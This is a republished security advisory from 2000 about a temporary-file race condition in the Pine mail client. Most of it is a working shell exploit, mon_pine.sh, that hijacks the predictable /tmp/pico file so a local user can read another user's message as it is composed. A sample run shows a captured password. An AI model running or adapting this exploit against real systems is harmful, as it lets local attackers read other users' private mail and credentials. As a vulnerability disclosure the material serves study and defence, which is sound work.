Advisories : Pine temporary file hijacking vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Pine temporary file hijacking vulnerability

Title:	Pine temporary file hijacking vulnerability
Released by:	mat@hacksware.com
Date:	11th December 2000
Printable version:	Click here

   Hacksware Bug Report



1. Name: Pine temporary file hijacking vulnerability

2. Release Date: 2000.12.11

3. Affected Application:

   Pine Version 4.30(or maybe other versions)

4. Author: mat@hacksware.com

5. Type: Local Race Condition

6. Explanation

 If pine setting is like following:

  [x]  enable-alternate-editor-cmd

  [x]  enable-alternate-editor-implicitly

  editor                   = /usr/bin/vi

 pine creates it's temporary in in /tmp directory with names like /tmp/pico.007292(where 7292 is the pid of pine process running).



 You can simply symlink this file(/tmp/pico.) to another file that doesn't exist.

 When victim is editing message victim editor vi follows symlinks and creates another file.

 By removing this symlink and creating your own temporary file and making it writable to victim, you can hijack his mail message.



7. Exploits



--------------------mon_pine.sh start--------------------------------

#!/bin/sh

# Grab local pine messages

# Usage: ./mon_pine.sh 

# victim pine must use following settings

#

#  mat@hacksware.com

#  http://hacksware.com

#

# [x]  enable-alternate-editor-cmd

# [x]  enable-alternate-editor-implicitly

# editor                   = /usr/bin/vi

#



PID=$1

PICO_FILE=`printf "/tmp/pico.%.6d" $PID`

TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`

echo PICO_FILE is $PICO_FILE



#if $PICO_FILE and $TRASHCAN exists, remove them

if test -f $PICO_FILE

then

 rm -f $PICO_FILE

fi

if test -f $TRASHCAN

then

 rm -f $TRASHCAN

fi



ln -s $TRASHCAN $PICO_FILE

while :

do

 if test -f $TRASHCAN

 then

  break

 fi

done



echo Victim is Editing Pine Message

rm -f $PICO_FILE

echo We replace temporary file

touch $PICO_FILE

chmod 777 $PICO_FILE

echo "Get the message from "$PICO_FILE

echo "^C to break tailer"

tail -f $PICO_FILE

--------------------mon_pine.sh end  --------------------------------



8. Example



[mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep

 7292 pts/1    S      0:22 pine

[mat@overheaven /tmp]$ sh mon_pine.sh 7292

PICO_FILE is /tmp/pico.007292



... wait for victim to compose mail....



Victim is Editing Mail

We replace temporary file

Get the message from /tmp/pico.007292

^C to break tailer



Hello...



Your new password is "greenbee"



Don't let anyone know this...

Thanks..







--

=================================================

|               mat@hacksware.com               |

|             http://hacksware.com              |

=================================================